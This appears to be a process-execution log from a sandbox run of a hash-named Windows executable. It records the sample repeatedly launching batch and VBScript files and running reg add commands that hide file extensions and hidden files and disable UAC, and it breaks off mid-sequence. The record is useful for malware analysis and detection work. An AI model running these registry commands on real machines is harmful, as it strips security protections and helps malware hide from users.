C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rwcwAYkg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZUEAwgoQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jEgAksgE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OUgoEoAI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ymkIcYUE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iOAEsUks.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mWgYsQww.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jaAAUMIk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RGwoMwoM.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BKIYswEs.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IuEAskEU.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UaAowYgw.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eMYIAQMU.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EecIUQUQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lUAcwsUg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NYokAYMM.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lwcIMsgk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dIUAIIMk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eUosEAQE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\imAoMAsw.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

